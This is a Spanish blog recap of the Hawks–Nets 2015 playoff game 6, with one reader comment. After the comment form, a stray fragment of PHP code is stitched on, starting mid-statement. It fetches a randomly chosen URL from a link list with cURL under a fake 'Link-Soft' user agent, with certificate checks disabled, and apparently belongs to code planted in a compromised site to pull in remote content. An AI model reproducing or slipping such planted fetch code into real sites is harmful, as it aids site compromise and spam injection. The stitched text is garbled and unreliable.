La Crónica: Silencio en el Barclays Center

02 de May de 2015 por TheDeerHunter

Esperábamos los mismos derroteros de igualdad que han marcado la serie en el 6º de la Hakws-Nets. Así fue hasta el descanso, donde el equipo del Coach of the year únicamente había podido arrancar unos exiguos 6 puntos de ventaja. En la reanudación, no obstante, los Hawks nos brindaron el cuarto más brillante que nadie ha podido firmar en la conferencia Este en todo el curso, incluido un 23-3 inicial que mandaba irremediablemente al rival a la lona. Los Nets no tuvieron otra que claudicar y en medio del silencio cruel cumplir con todo un último cuarto de minutos de la basura y decepción. Un premio bastante afinado para una temporada irregular y una eliminatoria digna. Pero volvamos al detalle.

Hawks 111 – Nets 87

Potente comienzo de los Hawks quienes desde el salto mostraban sus cartas para llevarse el bote por la vía rápida. Dos primeros triples de Korver y Carroll (para un total de 5 sólo en el primer cuarto) y Millsap percutiendo ante la prevista ventaja física sobre Thaddeus que apenas había sido capaz de explotar en los anteriores choques. Un primer parcial cerrado con ventaja de 13 puntos. Nada mal.

El segundo parecía ser un reflejo de la eliminatoria. Si los Hawks habían pegado primero los Nets imponían su defensa y una segunda unidad que se ha mostrado superior. Con Jack y Anderson en pista el ataque fluyó para que tiros francos de Bogdanovic y Joe Johnson lograran reducir la diferencia a los 6 puntos, con la sensación de que el ambiente se iba a caldear mucho en contra de los halcones en la reanudación.

Nada más lejos. Al comienzo del tercero se certificó la calamidad de serie que ha firmado Deron Williams totalmente superado por Jeff Teague. Paradójicamente sin anotar un sólo punto resultó vital en el definitivo demarraje. Robó, taponó y sobre todo dió un clínic de pase espectacular. Cada error del rival, cada pérdida, cada tiro fallado, fue respondido por 2 o 3 puntos fulgurantes. En apenas 6 minutos se pasó del 51-45 del descanso al 74-48 que esencialmente finiquitaba la eliminatoria.

Poca historia a partir de ese momento. Los Nets asumieron su condición de derrotados y el público contempló apático el final de la campaña.

Las declaraciones de Deron Williams al final lo dicen todo: “Buscamos alcanzar playoffs. Lo hicimos y pensamos que hemos hecho un gran esfuerzo ante el equipo que es el mejor del Este.” Llevas toda la razón del mundo, Deron, pero tú antes molabas.

MVP: Paul Millsap. 25 puntos, 9 rebotes, 6 asistencias, 2 robos

Comenta

Un comentario a esta entrada

  1. Jose Luis dice:
    #1

    y Millsap agente libre… que poco van a durar estos Hawks si se sube a la parra

    Una pena la lesión de Sefolosha, si bien no es gran cosa en ataque podría dar descanso a Carroll en el quinteto titular y que éste le metiera poderío ofensivo a la segunda unidad… pero esta segunda unidad de Hawk, uf… a ver si Scott vuelve a ser lo que fue la pasada temporada

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>